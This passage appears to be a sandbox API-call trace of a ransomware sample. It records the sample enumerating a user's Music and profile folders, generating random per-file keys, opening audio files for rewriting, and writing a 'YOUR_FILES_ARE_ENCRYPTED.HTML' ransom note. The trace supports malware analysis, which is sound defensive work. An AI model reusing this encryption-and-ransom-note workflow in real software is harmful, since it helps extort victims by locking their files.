param_2="%02X" | out: param_1="17") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="AC") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="69") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="FF") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="7B") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="13") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="DC") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="1A") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="C8") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="A6") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="B2") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="24") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="B4") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="F7") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="96") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="E0") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="FA") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="7D") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="DC") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="B8") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="3F") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="EF") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="94") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="A0") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="6F") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="EB") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="44") returned 2 [0168.105] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="0D") returned 2 [0168.105] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\SkVxCvpKdtQjOiR8Ir9y.m4a" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\SkVxCvpKdtQjOiR8Ir9y.m4a") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\SkVxCvpKdtQjOiR8Ir9y.m4a" [0168.105] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.105] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0168.105] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22ba27e0, ftCreationTime.dwHighDateTime=0x1d7e11f, ftLastAccessTime.dwLowDateTime=0xfbcf2280, ftLastAccessTime.dwHighDateTime=0x1d7e433, ftLastWriteTime.dwLowDateTime=0xfbcf2280, ftLastWriteTime.dwHighDateTime=0x1d7e433, nFileSizeHigh=0x0, nFileSizeLow=0x13291, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="tdPwiKvOmFwgvO.wav", cAlternateFileName="TDPWIK~1.WAV")) returned 1 [0168.105] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\tdPwiKvOmFwgvO.wav") returned 48 [0168.105] lstrcmpW (lpString1="tdPwiKvOmFwgvO.wav", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.105] PathFindExtensionW (pszPath="tdPwiKvOmFwgvO.wav") returned=".wav" [0168.105] lstrlenW (lpString=".wav") returned 4 [0168.105] PathFindExtensionW (pszPath="tdPwiKvOmFwgvO.wav") returned=".wav" [0168.105] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0168.105] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\tdPwiKvOmFwgvO.wav" (normalized: "c:\\users\\5alr3u30d3\\music\\tdpwikvomfwgvo.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a4 [0168.106] GetFileSizeEx (in: hFile=0x5a4, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=78481) returned 1 [0168.106] GetProcessHeap () returned 0x270000 [0168.106] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x76081a0 [0168.108] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="84") returned 2 [0168.108] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="13") returned 2 [0168.108] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="49") returned 2 [0168.108] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="1B") returned 2 [0168.108] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="1E") returned 2 [0168.108] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="CF") returned 2 [0168.108] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="22") returned 2 [0168.108] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="17") returned 2 [0168.108] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="F9") returned 2 [0168.108] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="29") returned 2 [0168.108] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="DF") returned 2 [0168.108] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="CA") returned 2 [0168.108] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="B9") returned 2 [0168.108] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="2C") returned 2 [0168.108] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="57") returned 2 [0168.109] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="C7") returned 2 [0168.109] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="BD") returned 2 [0168.109] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="93") returned 2 [0168.109] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="B9") returned 2 [0168.109] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="6B") returned 2 [0168.109] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="F6") returned 2 [0168.109] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="74") returned 2 [0168.109] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="A0") returned 2 [0168.109] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="33") returned 2 [0168.109] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="91") returned 2 [0168.109] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="6B") returned 2 [0168.109] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="B9") returned 2 [0168.109] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="01") returned 2 [0168.109] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="C2") returned 2 [0168.109] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="2B") returned 2 [0168.109] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="EA") returned 2 [0168.109] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="1A") returned 2 [0168.110] lstrcpyW (in: lpString1=0x7618254, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\tdPwiKvOmFwgvO.wav" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\tdPwiKvOmFwgvO.wav") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\tdPwiKvOmFwgvO.wav" [0168.110] CreateIoCompletionPort (FileHandle=0x5a4, ExistingCompletionPort=0x3a0, CompletionKey=0x76081a0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.110] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x76081a0, lpOverlapped=0x76081a0) returned 1 [0168.110] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x602eb480, ftCreationTime.dwHighDateTime=0x1d7e1db, ftLastAccessTime.dwLowDateTime=0x77271e40, ftLastAccessTime.dwHighDateTime=0x1d7e2fb, ftLastWriteTime.dwLowDateTime=0x77271e40, ftLastWriteTime.dwHighDateTime=0x1d7e2fb, nFileSizeHigh=0x0, nFileSizeLow=0x1229a, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="vENfC-vF_q47b2P1dmc.mp3", cAlternateFileName="VENFC-~1.MP3")) returned 1 [0168.110] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\vENfC-vF_q47b2P1dmc.mp3") returned 53 [0168.110] lstrcmpW (lpString1="vENfC-vF_q47b2P1dmc.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.110] PathFindExtensionW (pszPath="vENfC-vF_q47b2P1dmc.mp3") returned=".mp3" [0168.110] lstrlenW (lpString=".mp3") returned 4 [0168.110] PathFindExtensionW (pszPath="vENfC-vF_q47b2P1dmc.mp3") returned=".mp3" [0168.110] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0168.110] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\vENfC-vF_q47b2P1dmc.mp3" (normalized: "c:\\users\\5alr3u30d3\\music\\venfc-vf_q47b2p1dmc.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0168.110] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=74394) returned 1 [0168.110] GetProcessHeap () returned 0x270000 [0168.110] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0168.115] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="C9") returned 2 [0168.115] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="0A") returned 2 [0168.115] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="57") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="4B") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="08") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="40") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="F0") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="03") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="F6") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="39") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="FB") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="20") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="63") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="08") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="61") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="4A") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="FE") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="BE") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="81") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="D8") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="FC") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="62") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="6D") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="D2") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="14") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="99") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="8D") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="20") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="0E") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="35") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="A9") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="31") returned 2 [0168.117] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\vENfC-vF_q47b2P1dmc.mp3" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\vENfC-vF_q47b2P1dmc.mp3") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\vENfC-vF_q47b2P1dmc.mp3" [0168.117] CreateIoCompletionPort (FileHandle=0x5b8, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.117] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0168.117] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71621130, ftCreationTime.dwHighDateTime=0x1d7d9fb, ftLastAccessTime.dwLowDateTime=0xa018ae00, ftLastAccessTime.dwHighDateTime=0x1d7da80, ftLastWriteTime.dwLowDateTime=0xa018ae00, ftLastWriteTime.dwHighDateTime=0x1d7da80, nFileSizeHigh=0x0, nFileSizeLow=0x14657, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Zn pdo0h3pIYzQ.mp3", cAlternateFileName="ZNPDO0~1.MP3")) returned 1 [0168.117] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\Zn pdo0h3pIYzQ.mp3") returned 48 [0168.117] lstrcmpW (lpString1="Zn pdo0h3pIYzQ.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 1 [0168.117] PathFindExtensionW (pszPath="Zn pdo0h3pIYzQ.mp3") returned=".mp3" [0168.117] lstrlenW (lpString=".mp3") returned 4 [0168.117] PathFindExtensionW (pszPath="Zn pdo0h3pIYzQ.mp3") returned=".mp3" [0168.117] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0168.117] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\Zn pdo0h3pIYzQ.mp3" (normalized: "c:\\users\\5alr3u30d3\\music\\zn pdo0h3piyzq.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0168.118] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=83543) returned 1 [0168.118] GetProcessHeap () returned 0x270000 [0168.118] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x744a1c0 [0168.120] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="68") returned 2 [0168.120] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="EA") returned 2 [0168.120] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="0A") returned 2 [0168.120] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="18") returned 2 [0168.120] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="FB") returned 2 [0168.120] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="25") returned 2 [0168.120] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="B6") returned 2 [0168.120] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="66") returned 2 [0168.120] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="4E") returned 2 [0168.121] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="23") returned 2 [0168.121] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="CD") returned 2 [0168.121] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="0B") returned 2 [0168.121] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="38") returned 2 [0168.121] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="D4") returned 2 [0168.121] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="3D") returned 2 [0168.121] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="F2") returned 2 [0168.121] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="C5") returned 2 [0168.121] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="58") returned 2 [0168.121] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="4A") returned 2 [0168.121] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="09") returned 2 [0168.121] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="AD") returned 2 [0168.121] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="FA") returned 2 [0168.121] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="14") returned 2 [0168.121] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="6D") returned 2 [0168.121] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="E0") returned 2 [0168.121] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="5A") returned 2 [0168.121] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="F3") returned 2 [0168.121] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="CF") returned 2 [0168.121] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="EB") returned 2 [0168.121] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="99") returned 2 [0168.121] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="CE") returned 2 [0168.121] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="52") returned 2 [0168.122] lstrcpyW (in: lpString1=0x745a274, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\Zn pdo0h3pIYzQ.mp3" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\Zn pdo0h3pIYzQ.mp3") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\Zn pdo0h3pIYzQ.mp3" [0168.122] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x744a1c0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.122] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x744a1c0, lpOverlapped=0x744a1c0) returned 1 [0168.122] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71621130, ftCreationTime.dwHighDateTime=0x1d7d9fb, ftLastAccessTime.dwLowDateTime=0xa018ae00, ftLastAccessTime.dwHighDateTime=0x1d7da80, ftLastWriteTime.dwLowDateTime=0xa018ae00, ftLastWriteTime.dwHighDateTime=0x1d7da80, nFileSizeHigh=0x0, nFileSizeLow=0x14657, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Zn pdo0h3pIYzQ.mp3", cAlternateFileName="ZNPDO0~1.MP3")) returned 0 [0168.122] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0168.122] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 59 [0168.122] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\music\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0168.123] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0168.124] CloseHandle (hObject=0x5a0) returned 1 [0168.125] GetProcessHeap () returned 0x270000 [0168.126] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0168.126] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xd26fc530, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd26fc530, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd26fc530, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0168.126] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\My Documents") returned 36 [0168.126] GetProcessHeap () returned 0x270000 [0168.126] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0168.126] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\My Documents" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\My Documents") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\My Documents" [0168.126] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\My Documents", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\My Documents\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\My Documents\\*" [0168.126] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\My Documents\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71621130, ftCreationTime.dwHighDateTime=0x1d7d9fb, ftLastAccessTime.dwLowDateTime=0xa018ae00, ftLastAccessTime.dwHighDateTime=0x1d7da80, ftLastWriteTime.dwLowDateTime=0xa018ae00, ftLastWriteTime.dwHighDateTime=0x1d7da80, nFileSizeHigh=0x0, nFileSizeLow=0x14657, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Zn pdo0h3pIYzQ.mp3", cAlternateFileName="ꅠݎ")) returned 0xffffffff [0168.126] GetProcessHeap () returned 0x270000 [0168.127] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0168.127] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xd26fc530, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd26fc530, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd26fc530, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="NetHood", cAlternateFileName="")) returned 1 [0168.127] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\NetHood") returned 31 [0168.127] GetProcessHeap () returned 0x270000 [0168.127] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0168.127] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\NetHood" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\NetHood") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\NetHood" [0168.127] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\NetHood", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\NetHood\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\NetHood\\*" [0168.127] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\NetHood\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71621130, ftCreationTime.dwHighDateTime=0x1d7d9fb, ftLastAccessTime.dwLowDateTime=0xa018ae00, ftLastAccessTime.dwHighDateTime=0x1d7da80, ftLastWriteTime.dwLowDateTime=0xa018ae00, ftLastWriteTime.dwHighDateTime=0x1d7da80, nFileSizeHigh=0x0, nFileSizeLow=0x14657, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Zn pdo0h3pIYzQ.mp3", cAlternateFileName="ꅠݎ")) returned 0xffffffff [0168.127] GetProcessHeap () returned 0x270000 [0168.128] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0168.128] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xd23442d0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xaf243ac0, ftLastAccessTime.dwHighDateTime=0x1d7e775, ftLastWriteTime.dwLowDateTime=0xaf9f4460, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0168.128] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\NTUSER.DAT") returned 34 [0168.128] lstrcmpW (lpString1="NTUSER.DAT", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.128] PathFindExtensionW (pszPath="NTUSER.DAT") 